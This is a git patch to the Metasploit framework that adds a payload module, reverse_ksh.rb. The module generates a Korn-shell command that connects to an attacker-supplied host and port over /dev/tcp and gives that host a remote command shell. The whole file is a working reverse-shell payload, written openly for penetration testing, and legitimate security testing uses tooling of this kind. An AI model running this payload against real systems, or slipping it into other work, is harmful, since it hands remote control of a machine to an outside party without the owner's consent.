From 53844cb24a5174e8e11ef2e130c9f7e5cf5e1c56 Mon Sep 17 00:00:00 2001
From: WangYihang <wangyihanger@gmail.com>
Date: Tue, 15 May 2018 22:36:47 +0800
Subject: [PATCH] Add an reverse shell payload by ksh(the korn shell)

---
 .../payloads/singles/cmd/unix/reverse_ksh.rb  | 44 +++++++++++++++++++
 1 file changed, 44 insertions(+)
 create mode 100644 modules/payloads/singles/cmd/unix/reverse_ksh.rb

diff --git a/modules/payloads/singles/cmd/unix/reverse_ksh.rb b/modules/payloads/singles/cmd/unix/reverse_ksh.rb
new file mode 100644
index 0000000000..f65e5b6669
--- /dev/null
+++ b/modules/payloads/singles/cmd/unix/reverse_ksh.rb
@@ -0,0 +1,44 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+  CachedSize = 110
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'Unix Command Shell, Reverse TCP (via Ksh)',
+      'Description' => %q{
+        Connect back and create a command shell via Ksh.  Note: Although Ksh is often
+        available, please be aware it isn't usually installed by default.
+      },
+      'Author'      => 'Wang Yihang <wangyihanger[at]gmail.com>',
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'unix',
+      'Arch'        => ARCH_CMD,
+      'Handler'     => Msf::Handler::ReverseTcp,
+      'Session'     => Msf::Sessions::CommandShell,
+      'PayloadType' => 'cmd',
+      'RequiredCmd' => 'ksh',
+      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+    ))
+  end
+
+  def generate
+    return super + command_string
+  end
+
+  def command_string
+    # ksh -c 'ksh >/dev/tcp/${HOST}/${PORT} <&1'
+    cmd = "ksh -c 'ksh >/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} <&1'"
+  end
+end